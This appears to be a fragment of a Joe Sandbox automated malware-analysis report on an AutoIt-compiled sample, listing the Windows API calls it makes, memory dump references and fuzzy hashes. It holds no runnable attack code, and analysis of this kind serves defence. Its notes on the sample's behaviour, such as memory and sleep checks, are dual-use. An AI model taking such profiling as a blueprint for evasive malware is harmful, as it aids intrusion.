                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
• String ID: \$h
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memcmp
• String ID: &
                                                                                                                                                                                                                                                            • API String ID: 2931989736-1010288
                                                                                                                                                                                                                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                            • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                                                                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                                                                                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$_sprintf_strlen
                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                            • API String ID: 1921645428-436463671
                                                                                                                                                                                                                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
• Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 0045134A
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
• Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
• Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
• Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
• Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
• Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
